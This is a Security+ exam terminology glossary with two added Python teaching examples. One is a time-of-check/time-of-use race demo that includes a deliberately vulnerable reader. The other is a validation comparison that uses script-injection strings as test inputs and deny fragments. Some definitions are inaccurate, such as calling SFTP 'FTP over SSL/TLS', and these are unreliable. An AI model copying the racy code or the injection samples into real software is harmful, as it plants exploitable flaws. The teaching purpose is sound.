CompTIA Security+ Terminology review
Physical controls
(Security) controls that impact the physical world. Examples of this include fences, perimeter lighting, locks, fire suppression systems, and burglar alarms.
Hoax
(n.) an act intended to trick or deceive, a fraud; (v.) to trick, deceive
How to enforce security of machine learning algorithms
- Understand the quality and security of source data - Work with AI and ML developers to ensure that they are working in secure environments and that data sources, systems, and tools are maintained in a secure manner - Ensure that changes to AI and ML algorithms are reviewed, tested, and documented. - Encourage reviews to prevent intentional or unintentional bias in algorithms - Engage domain experts wherever possible
For datacenters and other facilities, a good rule of thumb is to place datacenters at least how far apart?
90 miles
Staging Environment
A "production like" environment to test installation, configuration and migration scripts; performance testing, load testing, processes required by other teams, boundary partners, etc.
Initialization Vector (IV)
A 24-bit value used in WEP that changes each time a packet is encrypted.
Online CA
A CA that is directly connected to a network; most common; these are the subordinate (intermediate) CAs that the offline root CA creates using its root certificate.
Offline CA
A CA that is not directly connected to a network; often used for root certificates, the top-level certificate for their entire PKI.
BPDU Guard
A Cisco switch feature that listens for incoming STP BPDU messages, disabling the interface if any are received. The goal is to prevent loops when a switch connects to a port expected to only have a host connected to it.
Netflow
A Cisco-developed means of reporting network flow information to a structured database; allows better understanding of IP traffic flows as used by different network applications and hosts.
DNS sinkhole
A DNS server that gives out a false result for a domain name.
journalctl
A Linux command line utility used for querying and displaying logs from journald, the systemd logging service on Linux.
head (command)
A Linux command that displays the first set of lines of a text file; by default, this command displays the first 10 lines.
chmod (command)
A Linux command used to change a mode or permissions for files.
cat (command)
A Linux command used to display (or concatenate) the entire contents of a text file to the screen.
tail (command)
A Linux command used to display lines of text at the end of a file; by default, this command displays the last 10 lines of the file.
NAC (Agent)
A NAC solution that installs and deploys onto a network so that it can produce secure network environments
NAC (agentless)
A NAC solution that runs from network memory and isn't installed on the systems; instead, a machine requesting to join the network is deployed with this solution to ensure the environment is secure.
Certificate revocation list (CRL)
A PKI component which lists digital certificates that have been revoked
Common Vulnerability Scoring System (CVSS)
A SCAP specification for communicating the characteristics of vulnerabilities and measuring their relative severity.
SIEM Correlation
A SIEM feature that searches the data acquired through SIEM aggregation to look for common characteristics, such as multiple attacks coming from a specific source; in a SIEM, the process of establishing a relationship between two variables. This is extremely useful because it can identify a large amount of malicious activity on networks much more easily.
SIEM Rules
A SIEM quality that is essentially the heart of alarms, alerts, and correlation engines in a SIEM; preconfigured conditions that can use logic to determine if and when this quality will be activated, and then actions can trigger based on this.
Type 2 SOC report
A SOC report that provides the auditor's opinion on the operating effectiveness of controls; that is, the auditor actually confirms that the controls are functioning properly; this report goes further than its counterpart.
netstat
A TCP/IP command-line utility that shows the status of each active connection.
Measured boot
A UEFI firmware feature that logs the startup process. Antimalware software can analyze this log to determine whether malware is on the computer or whether the boot components were tampered with.
Always-on VPN
A VPN that allows the user to always stay connected instead of connecting and disconnecting from it.
Captive portals
A Web page that the user of a public-access network is obliged to view and interact with before access is granted.
Last Known Good Configuration
A Windows feature that starts the computer by using the registry information that was saved during the last shutdown; built in for the patching process, allowing a return to a checkpoint before a patch was installed.
P7B
A Windows-exclusive certificate that is stored in ASCII text format. The name of it is the same as the file extension.
Personal Information Exchange
A binary format of digital certificates commonly used by Windows systems. Stored in files with the .PFX or .P12 file extensions.
Fingerprint scanner
A biometric technology that can detect the unique patterns and swirls of an individual's finger.
Live boot media
A bootable operating system that can run from removable "lightweight" media like a thumb drive or DVD; allows you to boot a full OS that can see the hardware that a system runs on and that can typically mount and access drives and other devices (meaning repair efforts can be run from a known good, trusted operating system).
Command and control
A botnet system that operates in a client-server mode; the bots contact central control systems, which provide commands and updates, and track how many systems are in the botnet.
Switching Loop prevention
A broad term for a method of preventing switching loop or bridge loop problems. Both STP and RSTP prevent this.
Internet of Things
A broad term that describes network-connected devices that are used for automation, sensors, security, and similar tasks; bring a large number of security and privacy concerns
Route security
A broad term that describes the basis of communicating between networks and the need to understand that protocols connect these various networks for important functionality.
USB OTG
A cable used to connect mobile devices to other devices. It is one of many methods that you can use to connect a mobile device to external media.
Trusted Platform Module
A chip designed to secure hardware by storing encryption keys, digital certificates, passwords, and data specific to the host system for hardware authentication
Transposition cipher
A cipher that rearranges the order of characters in a message; involves transposing or scrambling the letters in a certain manner
Right-to-audit clause
A clause where the auditor can audit without notice; alerts vendors that the company reserves the right to audit the vendor's books at any time.
Serverless Architecture
A cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers.
IaaS
A cloud computing model that allows an organization to rent access to hardware in a self-managed platform.
XaaS (Anything as a Service)
A cloud computing model that can work with a combination of other models: SaaS, IaaS, PaaS
PaaS
A cloud computing model that provides cloud customers with an easy-to-configure operating system and on-demand computing capabilities.
SaaS
A cloud computing model where the vendor hosts the software online and users access and use the software over the internet.
ISO 27001
A code of practice for implementing an information security management system, against which organizations can be certified.
ISO 27002
A code of practice for information security with hundreds of potential controls and control mechanisms. The standard is intended to provide a guide for the development of "organizational security standards and effective security management practices and to help build confidence in inter-organizational activities".
ISO 27701
A code of practice that is an extension to ISO 27001 and is a framework for managing privacy controls to reduce the risk of privacy breach to the privacy of individuals.
ISO 31000
A code of practice that provides guidelines for risk management programs. This document is not specific to cybersecurity or privacy but covers risk management in a general way so that it may be applied to any risk.
Baseline configuration
A collection of security and configuration settings that are to be applied to a particular system or network in the organization.
Security orchestration, automation, and response (SOAR)
A collection of software solutions and tools that allow organizations to streamline security operations in three key areas: threat and vulnerability management, incident response, and security operations automation.
Memdump
A command line utility used to dump system memory to the standard output stream by skipping over holes in memory maps.
traceroute/tracert
A command on many computer operating systems that discovers the IP addresses, and possibly host names, of the routers used by the network when sending a packet from one computer to another.
PowerShell
A command-line interactive scripting environment that provides the commands needed for most management tasks in a Windows Server 2012/R2 environment.
netcat
A command-line tool used to connect to remote systems.
nmap
A command-line tool used to scan networks. It is a type of network scanner.
dd (utility)
A command-line utility for Unix, Unix-like operating systems and beyond, the primary purpose of which is to convert and copy files.
theHarvester
A command-line utility for gathering results from open source intelligence queries.
route (command)
A command-line utility that allows you to display and make changes to the local IP routing table of the computer.
curl (command)
A command-line utility that can be used to obtain a Web page from a Web server.
ipconfig/ifconfig
A command-line utility that displays all the network configurations of the currently connected network devices and can modify the DHCP and DNS settings.
dnsenum
A command-line utility that is used for DNS enumeration to locate all DNS servers and DNS entries for a given organization.
Tcpreplay
A command-line utility that replays packets saved to a file back through a network adapter.
ping/pathping
A command-line utility used to determine if a host is reachable on an Internet Protocol network.
nslookup/dig
A command-line utility used to determine the IP address associated with a domain name, obtain the mail server settings for a domain, and other DNS information
Tcpdump
A common packet analyzer that runs under the command line. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
RAID
A common solution that uses multiple disks with data either striped or mirrored to ensure that data is not corrupted or lost; ensures that one or more disk failures can be handled by an array without losing data
Point-to-multipoint
A communications arrangement in which one transmitter issues signals to multiple receivers. The receivers may be undefined, as in a broadcast transmission, or defined, as in a non-broadcast transmission.
Images
A complete copy of a system or server, typically down to the bit level for the drive.
SIEM Sensors (component of dashboard)
A component that is often deployed to gather additional data; typically software agents, although they can be a VM or even a dedicated device; gather useful data for the SIEM and may either forward it in its original form or do some preprocessing to optimize the data before the SIEM ingests it.
Unified threat management
A comprehensive security management tool that combines multiple security tools, including firewalls, virtual private networks, intrusion detection systems, and web content filtering and anti-spam software
Kerberos
A computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner
Master Service Agreement (MSA)
A contract where parties agree to the terms that will govern future actions. This makes future services and contracts easier to handle and define; provides an umbrella contract for the work that a vendor does with an organization over an extended period of time.
Test environment
A controlled environment established to test products, services, and other configuration items.
Legal hold
A court order to maintain data for evidence; a notice that informs an organization that they must preserve data and records that might be destroyed or modified in the course of their normal operations.
Communication plan
A critical IR plan that outlines roles, such as who should communicate with the press or media, who will handle specific stakeholders, and who makes the final call on the tone or content of the communications.
SSH
A cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.
Secure Shell (SSH) Protocol
A cryptographic network protocol for operating network services securely over an unsecured network. The best known example application is for remote login to computer systems by users.
FTK imager
A data preview and imaging tool that lets you quickly assess electronic evidence to determine if further analysis with a forensic tool is needed.
Point-to-point
A data transmission that involves one transmitter and one receiver; single sender and single receiver.
Hardware Security Module
A dedicated cryptographic processor that provides protection for cryptographic keys.
Air gap
A design that physically separates network segments, thus preventing network connectivity; requires data to be physically transported.
Virtual desktop infrastructure (VDI)
A desktop operating system running within a virtual machine (VM) running on a server.
Disaster recovery plan
A detailed process for recovering information or an IT system in the event of a catastrophic disaster such as a fire or flood; focuses on natural and man-made disasters that may destroy facilities, infrastructure, or otherwise prevent an organization from functioning normally.
Signage
A deterrent control that acts to prevent those who might casually violate the rules shown, not those actively seeking to bypass the security controls an organization has in place
Continuous integration
A development practice that requires developers to integrate code into a shared repository several times a day. Each check-in is then verified by an automated build, allowing teams to detect problems early.
Corporate owned, personally enabled (COPE)
A device agreement that an organization creates that is similar to the traditional corporate-owned model, but the primary difference is that the employees are free to use the device as if it was their personally owned device.
Proximity reader
A device that uses RFID to query a badge without requiring it to be inserted or swiped through a magnetic stripe reader
Proxy servers
A device/computer that all other computers must go through before accessing the Internet; a server (computer or application) that acts as an intermediary for requests from clients seeking resources from other servers.
Token key
A dynamic changing key that is able to identify a user digitally; a something you have factor.
Continuity of Operations Planning
A federally sponsored program in the US that is part of the national continuity program. It defines the requirements that government agencies need to meet to ensure that continuity of operations can be ensured; also defines how federal agencies build a complete DR and BC plan.
SSH File Transfer Protocol
A file transfer protocol that allows the encryption of transmissions using the Secure Shell (SSH) protocol; FTP that runs on an SSL/TLS-secured connection.
Content/URL filter
A filter used to limit specific types of content across the web to users.
Stateless firewall
A firewall that manages each incoming packet as a stand-alone entity without regard to currently active connections. These firewalls are faster than their counterpart, but are not as sophisticated.
Pointer/object dereference
A flaw that results in a pointer being given NULL instead of a valid value.
Quantum computing
A form of computing that uses the principles of quantum physics to represent data and perform operations on these data.
MAC filtering
A form of network access control to allow or block access based on the MAC address. It is configured on switches for port security or on APs for wireless security.
Impact assessment
A form of policy analysis that examines the likely effects or impacts of proposed or adopted policies. These may be environmental, social, economic, or other significant impacts.
Session Initiation Protocol (SIP) traffic
A form of protocol-based traffic that can include internet telephony, video conferencing and other forms of unified communications.
ZigBee
A form of wireless communications frequently used in security systems and heating and cooling control systems; designed for PANs like those found in houses for home automation.
Terms of agreement
A formal list of rules you agree to follow; also lists consequences you agree to accept for not following the rules.
Business Impact Analysis (BIA)
A formal process designed to identify the mission essential functions within an organization and facilitate the identification of the critical systems that support those functions.
Risk control assessment
A formalized approach to risk prioritization that allows organizations to conduct their reviews in a structured manner.
NIST CSF
A framework designed to assist organizations attempting to meet one or more of the following five objectives: - Describe their current cybersecurity posture - Describe their target state for cybersecurity - Identify and prioritize opportunities for improvement within the context of a continuous and repeatable process - Assess progress toward the target state - Communicate among internal and external stakeholders about cybersecurity risk.
The Diamond Model of Intrusion Analysis
A framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim; describes a sequence where an adversary deploys a capability targeted at an infrastructure against a victim.
Data governance policy
A generic policy that defines who is responsible for the data, how it can be accessed, how it should be used, and how its integrity can be maintained; clearly states the ownership of information created or used by the organization.
Data classification policy
A generic policy that describes the classification structure used by the organization and the process used to properly assign classifications to data; policy that should describe the classifications, levels of control at each classification and responsibilities of all potential users including ownership
Data retention policy
A generic policy that outlines what information the organization will maintain and the length of time different categories of work product will be retained prior to destruction; a security policy that stipulates how long data is retained by the organization, based on the data type.
IP theft risks
A generic term for risks that occur when a company possesses trade secrets or other proprietary information which, if disclosed, could compromise the organization's business advantage.
Software compliance/licensing risks
A generic term for risks that occur when an organization licenses software from a vendor and intentionally or accidentally runs afoul of usage limitations that expose the customer to financial and legal risk.
Magnitude
A generic term that refers to the impact that a given risk will have on an organization if it does occur; may be expressed as a financial cost, although there are other possible measures.
Likelihood of occurrence
A generic term that refers to the probability that a risk will occur.
Risk matrix/heat map
A graphical table indicating the likelihood and impact of risk factors identified for a workflow, project, or department for reference by stakeholders; quickly summarizes risks and allows senior leaders to quickly focus on the most significant risks facing the organization.
Stored procedures
A group of SQL statements that execute as a whole, similar to a mini-program. Developers use stored procedures to prevent SQL injection attacks.
Honeynet
A group of honeypots in a network. Honeynets are often configured in virtual networks.
Red Team
A group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. The group's objective is to improve enterprise information assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders in an operational environment.
Semi-authorized hackers
A hacker who finds a vulnerability, but doesn't take advantage of it (Gray Hat)
Jump servers
A hardened system on a network specifically used to access devices in a separate security zone.
Password keys
A hardware-based authentication device that stores passwords and helps prevent unauthorized logins and account takeovers.
NAT gateway
A highly available, managed Network Address Translation (NAT) service for your resources in a private subnet to access the Internet.
Pre-shared key
A key value that must be created and entered into the access point and all devices prior to the devices communicating with the access point.
MITRE ATT&CK
A knowledge base and framework of different attack techniques to understand and defend against an attacker; includes detailed descriptions, definitions, and examples for the complete threat lifecycle from initial access through execution, persistence, privilege escalation, and exfiltration.
Data breach notification laws
A law that varies by country/location and specifies the maximum time that can elapse before customers are notified of a data breach.
Cold aisle
A layout created by having the front of the equipment face toward the center of the aisle. Typically, these face air conditioner output ducts.
Hot aisle
A layout that has the back of the equipment face the aisle. Typically these face air conditioner return ducts.
Non-Disclosure Agreement (NDA)
A legal contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share with one another for certain purposes but wish to restrict access to or by third parties
Access control list
A list attached or linked to a specific resource that describes users or user groups and the nature of permitted access
Penetration testing
A live test of the effectiveness of security defenses through mimicking the actions of real-life attackers
Raspberry Pi
A low-budget, single-board, pocket-sized computer which is easy to program; can run a variety of different OSs; more likely to be found used for personal development or small-scale custom use.
NIST RMF
A mandatory standard for federal agencies that provides a formalized process that federal agencies must follow to select, implement, and assess risk-based security and privacy controls; a risk-based approach to selection of security controls and considers effectiveness, efficiency, and constraints due to applicable laws, directives, executive orders, policies, standards, or regulations.
Online backup
A means of backing up or storing data using the Internet; data is always available
Mandatory Access Control (MAC)
A means of restricting access to data based on varying degrees of security requirements for information contained in the objects and the corresponding security clearance of users or programs acting on their behalf; typically found in military settings
Mean Time Between Failures (MTBF)
A measure of the reliability of a system; the expected amount of time that will elapse between system failures.
Faraday cage
A metallic enclosure that blocks an electromagnetic field.
Filesystem permissions
A method for protecting files managed by the OS
Substitution cipher
A method of encryption and decryption in which each letter in the alphabet is replaced by another; a type of coding or ciphering system that changes one character or symbol into another; involves simply shifting all letters a certain number of spaces in the alphabet.
Computer-based training
A method of training that utilizes computer technology to enhance the acquisition of knowledge and skills
Protected Extensible Authentication Protocol (PEAP)
A method to securely transmit authentication information over wired or wireless networks. It uses server-side public key certificates to authenticate the server.
Port spanning/port mirroring
A method used on a network switch to send a copy of network packets seen on one switch port to a network monitoring connection on another switch port.
Continuous delivery
A methodology that focuses on making sure software is always in a releasable state throughout its lifecycle.
Arduino
A microcontroller (not single-board) that includes a lower-power CPU with a small amount of memory and storage; provides I/O capabilities; often used for prototyping devices that interface with sensors, motors, lighting, etc.; has a reduced attack surface because it does not have a wired/wireless network connection built into it.
Choose Your Own Device (CYOD)
A mobile device deployment methodology where each person chooses their own device type.
Purple Team
A mode of penetration testing where red and blue teams share information and collaborate throughout the engagement.
Network segmentation
A network arrangement in which some portions of the network have been separated from the rest of the network in order to protect some resources while granting access to other resources.
Intranet
A network designed for the exclusive use of computer users within an organization that cannot be accessed by users outside the organization
Wi-Fi Protected Access 2
A network security technology commonly used on Wi-Fi wireless networks. It's an upgrade from the original WPA technology, which was designed as a replacement for the older and less secure WEP; the final version of WPA agreed on by the Wi-Fi Alliance; it implements all aspects of the ratified 802.11i security standard and is mandatory in the Wi-Fi certification process.
VLAN
A network that can logically group several different computers together, or logically separate computers, without regard to their physical location. It is possible to create multiples of this with a single switch.
Nessus
A network-vulnerability scanner available from Tenable Network Security.
White Team
A neutral team of employees acting as observers, referees, and judges between the other teams in a penetration test or incident response drill.
System on a Chip
A new type of processor that integrates the functions of a processor, memory, and video card on a single chip
Center for Internet Security (CIS)
A non-profit organization that publishes information on cybersecurity best practices and threats. They also provide tools to help harden your environment and provide risk management; an industry organization that publishes hundreds of benchmarks for commonly used platforms.
Open Web Application Security Project
A nonprofit organization focused on improving the security of application software.
Time-based one-time password
A one-time password or code that expires after 30 seconds (or another short period of time)
HMAC-based One-Time Password
A one-time password that changes when a specific event occurs.
Password vaults
A password manager that creates a database for all credentials/passwords; everything is encrypted, with personal and enterprise options.
Active Reconnaissance
A penetration testing method used to collect information. It sends data to systems and analyzes responses to gain information on the target.
Passive Reconnaissance
A penetration testing method used to gather and collect information. It typically uses open-source intelligence.
Metasploit
A penetration-testing tool that combines known scanning techniques and exploits to explore potentially new types of exploits; includes rootkits that leverage languages such as Perl, Bash, and Python.
Access control vestibules
A physical control (also called a mantrap) in which, when a person opens one door, another door locks until the initial door is closed and locked too.
Hardware firewall
A physical filtering component that inspects data packets from the network before they reach computers and other devices on a network; a free-standing unit that does not use the resources of the computers it is protecting, so there is no impact on processing performance
Host-based firewall
A piece of software running on a single host that can restrict incoming and outgoing network activity for that host only.
Ping of Death
A ping that exceeds the maximum packet size and causes the receiving system to fail.
Business continuity plan
A plan for how an organization will recover and restore partially or completely interrupted critical function(s) within a predetermined time after a disaster or extended disruption; focuses on keeping an organization functional when misfortune or incidents occur; in the context of IR processes, these plans may be used to ensure that systems or services that are impacted by an incident can continue to function despite any changes required by the IR process.
Incident response plans
A plan that describes the steps an organization performs in response to any situation determined to be abnormal in the operation of a computer system or network.
Clean desk space
A policy designed to ensure that all confidential or sensitive materials, either in paper form or electronic, are removed from a user's workspace and secured.
Acceptable use policy
A policy that a user must agree to follow in order to be provided access to a network or to the internet; a policy that provides network and system users with clear direction on permissible uses of information resources.
Subscriber Identity Module
A portable memory chip that holds the personal information of the item's account holder
Data masking
A privacy-enhancing technology that partially redacts sensitive information by replacing some or all of sensitive fields with blank characters. An example is replacing all but the last four digits of a credit card number with X's to render the card number unreadable.
Virtual Private Network
A private data network that creates secure connections, or "tunnels," over regular Internet lines
Key escrow
A process in which keys are managed by a third party, such as a trusted CA.
GPS tagging
A process of adding geographical data to files such as pictures. It typically includes latitude and longitude coordinates of the location where the picture was taken or the file was created.
Containment
A process that leaves a system in place but works to prevent further malicious actions or attacks; frequently accomplished using firewall rules or similar capabilities to limit the traffic that the system can send or receive.
Version control
A process to keep track of what changes were made to what files so that a specific version can be referred to and improvements in multiple versions can be merged together.
Pulverizing
A process used to physically destroy items such as optical discs that aren't erased by a degausser; breaks devices down into very small pieces to prevent recovery
Bug bounty
A program run by a company that pays a significant reward to anyone who finds and reports problems (bugs) in their system.
Software firewall
A program that runs on a computer to allow or deny traffic between the computer and other computers to which it is connected
Compiler
A program that translates instructions or code into a language that can be read and understood by a computer.
Input validation
A programming process that verifies data is valid before using it.
SEAndroid
A project that ports NSA's SELinux mandatory access control to Android devices to address a broad range of system security issues; it confines apps and system processes to limit malicious activity and provides centralized policy configuration for all deployments.
Secure Real-time Transport Protocol (SRTP)
A protocol for providing protection (encryption, integrity, and anti-replay) for Voice over IP (VoIP) communications.
Post Office Protocol
A protocol that allows a computer to retrieve email from a server.
Dynamic Host Configuration Protocol
A protocol that allows dynamic IP address allocation so users do not have to have a preconfigured IP address to use the network
Layer 2 Tunneling Protocol
A protocol that combines PPTP and L2F; a tunneling protocol used to support virtual private networks or as part of the delivery of services by ISPs.
Domain Name System
A protocol that resolves human-readable domain names to IP addresses (and, through reverse lookups, IP addresses to names).
Trusted Automated eXchange of Intelligence Information (TAXII)
A protocol that is intended to allow cyber threat information to be communicated at the application layer via HTTPS; specifically designed to support STIX data exchange
Online Certificate Status Protocol (OCSP)
A protocol that performs a real-time lookup of a certificate's status; an Internet protocol that obtains the revocation status of an X.509 digital certificate.
SSL
A protocol that provides security when communicating on the Internet
Internet Message Access Protocol
A protocol that resides on an incoming mail server. Similar to POP, but more powerful: messages stay on the server, mailboxes can be shared, and several clients can access the same mailbox. The current version is IMAPv4.
Short message service
A protocol used by cellular providers to enable text messages to be sent from one mobile device to another.
IPSec
A protocol used to encrypt traffic on the wire and can operate in both tunnel mode and transport mode.
TLS
A protocol used to encrypt traffic on the wire; the replacement for SSL and like SSL, it uses certificates issued by CAs.
Blockchain
A public digital ledger in which transactions made in bitcoin or another cryptocurrency are recorded chronologically and publicly; can store records in a way that distributes those records among many different systems located around the world and do so in a manner that prevents anyone from tampering with those records.
Time Of Check/Time Of Use
A race condition that occurs when a program checks access permissions too far in advance of a resource request
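The check-then-use race above, as an added example that is not part of the original page: the vulnerable reader inspects the path and then opens the path again, so an attacker who can replace the file between the two calls wins; the hardened reader opens once with O_NOFOLLOW and checks the descriptor it actually holds. The attacker's window is simulated with an in-process hook (a hypothetical parameter introduced for the demo) and the file layout is constructed in a temporary directory.

```python
import os
import stat
import tempfile

def read_if_regular_racy(path, _attacker_window=None):
    """Vulnerable pattern: check the path, then open the path again.
    _attacker_window is a hook used only by the demo below to stand in for the
    scheduler gap between the two system calls."""
    st = os.lstat(path)                              # time of check
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    if _attacker_window is not None:
        _attacker_window()                           # attacker swaps the file here
    with open(path, "rb") as f:                      # time of use: path is re-resolved
        return f.read()

def read_if_regular_safe(path, _attacker_window=None):
    """Hardened pattern: open exactly once, refusing to follow a symlink, then
    check the descriptor actually held. What was checked is what is used."""
    if _attacker_window is not None:
        _attacker_window()                           # same swap, before the open
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)                            # check the opened object itself
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)

def _fresh_dir():
    """Constructed layout: a secret the program must never read, and a harmless
    file the caller is allowed to read."""
    d = tempfile.mkdtemp()
    secret = os.path.join(d, "secret")
    target = os.path.join(d, "target")
    with open(secret, "wb") as f:
        f.write(b"TOP SECRET")
    with open(target, "wb") as f:
        f.write(b"harmless")
    return secret, target

def demo():
    """Returns what each version yields when the attacker replaces the harmless
    file with a symlink to the secret inside the check/use window."""
    results = {}
    for name, reader in (("racy", read_if_regular_racy), ("safe", read_if_regular_safe)):
        secret, target = _fresh_dir()

        def swap():
            os.remove(target)
            os.symlink(secret, target)

        try:
            results[name] = reader(target, _attacker_window=swap)
        except OSError:                    # O_NOFOLLOW on a symlink raises ELOOP
            results[name] = "refused"
    return results

if __name__ == "__main__":
    print(demo())
```

The general rule the safe version follows: perform the privilege or type check on the handle you will use, not on a name that can be re-bound underneath you. On Linux the same idea extends to openat() with a directory descriptor when the path has several components.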
Threat maps
A real-time map of the computer security attacks that are going on at any given time.
TACACS+ (Terminal Access Control Access Control System+)
A remote authentication protocol which allows a remote access server to communicate with an authentication server to validate user access onto the network.
Warm site
A remote site that contains computer equipment and network connectivity but is not kept current with the organization's data; backups must be restored and systems configured before it can take over, so recovery takes hours to days, placing it between a hot site and a cold site in cost and readiness.
Manual Code Review
A review that can be done in two ways: undirected and directed - undirected is essentially proofreading of code to oneself and directed is explaining the code to a team/group of people.
Qualitative Risk Assessment
A risk assessment that substitutes subjective judgments and categories for strict numerical analysis, allowing the assessment of risks that are difficult to quantify; a risk assessment that uses judgment to categorize risks. it is based on impact and likelihood of occurrence.
Quantitative Risk Assessment
A risk assessment that uses numeric data in the analysis, resulting in assessments that allow the very straightforward prioritization of risks; a risk assessment that uses specific monetary amounts to identify cost and asset value.
Risk mitigation
A risk management strategy of applying security controls to reduce the probability and/or magnitude of a risk; the most common risk management strategy.
Risk acceptance
A risk management strategy that boils down to deliberately choosing to take no other risk management strategy and to simply continue operations as normal in the face of the risk; may be warranted if the cost of mitigating a risk is greater than the impact of the risk itself.
Risk transference
A risk management strategy that shifts some of the impact of a risk from the organization experiencing the risk to another entity; the most common example is purchasing an insurance policy that covers a risk.
Risk avoidance
A risk management strategy where we change our business practices to completely eliminate the potential that a risk will materialize.
Risk and control self-assessment (RCSA)
A risk profile analysis process that identifies the risks, classifies each risk into clearly defined categories, and quantifies the risks with respect to the probability of occurrence and the impact on value and/or cash flows; a tool that allows an organization to understand its risks and their potential impact on the business. It is a formal exercise many organizations conduct annually.
Evil twin attack
A rogue wireless access point that broadcasts the same SSID as a legitimate network or a trusted provider's hotspot so that clients connect to it, letting the attacker intercept the information users transmit.
Iris scan
A scan of the colored portion of the eye, including all rifts, coronas, and furrows.
Non-Intrusive Scan
A scan that uses only available information to hypothesize the status of the vulnerability.
Protected cable distribution
A scheme that locks away or secures all the networking cables and shields them against emissions; it also keeps attackers from physically removing cables or plugging in additional ones; most commonly used by government and military facilities that carry classified traffic.
Two-person integrity control
A scheme where two trusted staff members must work together to provide access - with dual keys, with passwords, or with two portions of an access control factor
File Transfer Protocol Secure
A secure version of the File Transfer Protocol that wraps FTP in SSL/TLS. Explicit FTPS negotiates TLS on the standard FTP control port 21; implicit FTPS uses port 990. Not to be confused with SFTP, which runs over SSH.
Lightweight Directory Access Protocol over SSL
A secure, open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.
Deny List
A security configuration where access is allowed to any entity (software process, IP/domain, and so on) unless the entity appears on the (deny) list.
Allow list
A security configuration where access is denied to any entity (software process, IP/domain, and so on) unless the entity appears on the (allow) list.
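The difference between the Deny list and Allow list entries above is also the difference between weak and strong Input validation. As an added example (not code from the original page), the deny-list check below blocks a few known-bad fragments and is bypassed by a case change, while the allow-list check accepts only a positive pattern; the username policy is a hypothetical one chosen for the example.

```python
import re

# Constructed deny list of "known bad" fragments: the approach the Deny list
# entry describes, where anything not listed is allowed through.
DENY_FRAGMENTS = ("<script>", "javascript:", "onerror=")

def deny_list_accepts(value: str) -> bool:
    """Deny-list validation: accept unless a listed fragment appears verbatim."""
    return not any(fragment in value for fragment in DENY_FRAGMENTS)

# Allow list (hypothetical policy): a username is 3-32 characters, starting
# with a lowercase letter, followed by lowercase letters, digits or underscore.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")

def allow_list_accepts(value: str) -> bool:
    """Allow-list validation: accept only what matches the positive pattern.
    fullmatch anchors both ends, so a trailing newline or an appended shell
    command is rejected along with anything else not in the pattern."""
    return USERNAME_RE.fullmatch(value) is not None

def validate_username(value: str) -> dict:
    """Runs both checks on one input so the difference is visible."""
    return {"deny_list": deny_list_accepts(value),
            "allow_list": allow_list_accepts(value)}

if __name__ == "__main__":
    for sample in ("alice_01", "<script>alert(1)</script>", "<ScRiPt>alert(1)</ScRiPt>"):
        print(repr(sample), validate_username(sample))
```

A deny list can only ever be as complete as the attacker's imagination; an allow list needs no knowledge of attacks, only of what legitimate input looks like, which is why validation should be written in allow-list form wherever the input has a definable shape.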
Virtual machine escape protection
A security protection that prevents a virtual machine from directly interacting with the host operating system.
Mobile application management (MAM)
A security strategy that administers and enforces corporate e-policies for applications on mobile devices.
Moisture detection
A sensor that can detect water leaks, dampness, or increased moisture levels.
Hot site
A separate and fully equipped facility where the company can move immediately after a disaster and resume business
Cold site
A separate facility that does not have any computer equipment, but is a place where employees can move after a disaster; provides only rudimentary services and facilities; have space, power, and often network connectivity, but they are not prepared with systems or data
Honeypot
A server designed to attract an attacker. It typically has weakened security encouraging attackers to investigate it.
Network attached storage
A server that is placed on a network with the sole purpose of providing storage to users, computers, and devices attached to the network
Multimedia Messaging Service (MMS)
A service offered by wireless companies that allows cell phone users to attach and send a variety of media to other users.
RAID levels
A set of RAID configurations that consists of striping, mirroring, or parity.
Hardware root of trust
A set of functions, typically provided by a Trusted Platform Module (TPM) or similar hardware, that is always trusted by the computer's operating system (OS) and from which trust in later boot stages is derived (measured and secure boot).
Rootkit
A set of programs that enables its user to gain administrator level access to a computer without the end user's consent or knowledge.
Domain Name System Security Extensions
A set of specifications that provide authentication and other security mechanisms to DNS data.
Near Field Communication (NFC)
A set of standards primarily for smartphones and smart cards that can be used to establish communication between devices in close proximity.
MicroSD HSM
A small form-factor hardware encryption and security module that can be added to any mobile device with a MicroSD card slot.
Endpoint detection and response
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats
Microservices/API
A software architecture that is composed of smaller modules that interact through APIs and can be updated without affecting the entire system.
Continuous deployment
A software development approach where an organization's developers release products, features, and updates in shorter cycles, when ready, rather than wait for centrally-managed delivery schedules.
OpenSSL
A software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end; a widely used open-source implementation of the SSL/TLS protocol that was affected by the Heartbleed bug.
Data exposure
A software vulnerability where an attacker is able to circumvent access controls and retrieve confidential or sensitive data from the file system or database.
Quarantine
A solution which can place files in a specific safe zone until it can be determined whether they're safe to release or not.
Advanced Persistent Threat (APT)
A sophisticated, possibly long-running computer hack that is perpetrated by large, well-funded organizations such as governments
Web application firewall
A special type of application-aware firewall that looks at the applications using HTTP; A special type of firewall that looks more deeply into packets that carry HTTP traffic.
Functional recovery plans
A specific DRP for critical business functions.
Wi-Fi Protected Setup
A standard included on many WAPs and clients to make secure connections easier to configure
Wi-Fi direct/ad hoc
A standard that allows devices to connect without a wireless access point.
Wi-Fi Protected Access 3
A standard that offers improved data encryption over WPA2 and allows for Individual Data Encryption, whereby a laptop or other wireless device can create a secure connection over a public, unsecured Wi-Fi network.
Payment Card Industry Data Security Standard (PCI DSS)
A standard that provides detailed rules about the storage, processing, and transmission of credit and debit card information; not a law, but rather a contractual obligation that applies to credit card merchants and service providers worldwide.
File/code repositories
